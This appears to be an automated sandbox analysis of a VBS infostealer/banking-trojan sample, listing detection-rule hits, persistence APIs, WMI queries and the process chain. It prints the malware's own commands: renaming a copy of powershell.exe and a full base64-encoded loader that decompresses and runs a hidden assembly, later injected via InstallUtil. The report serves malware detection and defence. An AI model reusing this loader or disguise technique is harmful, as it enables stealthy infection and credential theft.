Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A85D63	7_2_06A85D63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A80040	7_2_06A80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A80006	7_2_06A80006
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0524FA70	13_2_0524FA70
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0524C7CB	13_2_0524C7CB
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0524C113	13_2_0524C113
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0524E970	13_2_0524E970
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E1360	13_2_075E1360
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E1687	13_2_075E1687
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E2568	13_2_075E2568
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_07C624D8	13_2_07C624D8
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09742040	13_2_09742040
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974A8C8	13_2_0974A8C8
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09741B28	13_2_09741B28
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09742030	13_2_09742030
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974A8C7	13_2_0974A8C7
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974A8B8	13_2_0974A8B8
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09741B19	13_2_09741B19
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09741D7F	13_2_09741D7F
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09748D50	13_2_09748D50
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09748D40	13_2_09748D40
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974E4A0	13_2_0974E4A0
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974E490	13_2_0974E490
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09740F18	13_2_09740F18
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09740F08	13_2_09740F08
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974E7BB	13_2_0974E7BB
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09741E14	13_2_09741E14
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09776D88	13_2_09776D88
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09770040	13_2_09770040
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09770012	13_2_09770012
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09775300	13_2_09775300
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_097752F0	13_2_097752F0
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0996E9A8	13_2_0996E9A8
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09960032	13_2_09960032
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09960040	13_2_09960040
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09B9DA70	13_2_09B9DA70
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09B80006	13_2_09B80006
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09B80040	13_2_09B80040

Source: DOCUMENTS.vbs

Initial sample: Strings found which are bigger than 50

Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTOMANTO.exe0 vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1621428905.00000000080D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTOMANTO.exe0 vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1622652511.0000000008D30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGtzvzp.dll" vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1624988999.0000000009220000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameec6b688e-076e-4107-a171-24c7221e7254.exe4 vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000000.1419812434.0000000000174000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameec6b688e-076e-4107-a171-24c7221e7254.exe4 vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.00000000049E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs DOCUMENTS.vbs
Source: DOCUMENTS.vbs.exe.2.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs DOCUMENTS.vbs

Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, ZTFEpdjP8zw.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, WnRNxU.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, 2njIk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, I5ElxL.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, QQSiOsa4hPS.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, FdHU4eb83Z7.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, 3VzYbXLJt4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, 3VzYbXLJt4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, 3VzYbXLJt4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, 3VzYbXLJt4.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winVBS@24/11@4/3

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1kdxc0y.ffv.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs"

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DOCUMENTS.vbs

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

File read: C:\Users\user\Desktop\DOCUMENTS.vbs

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
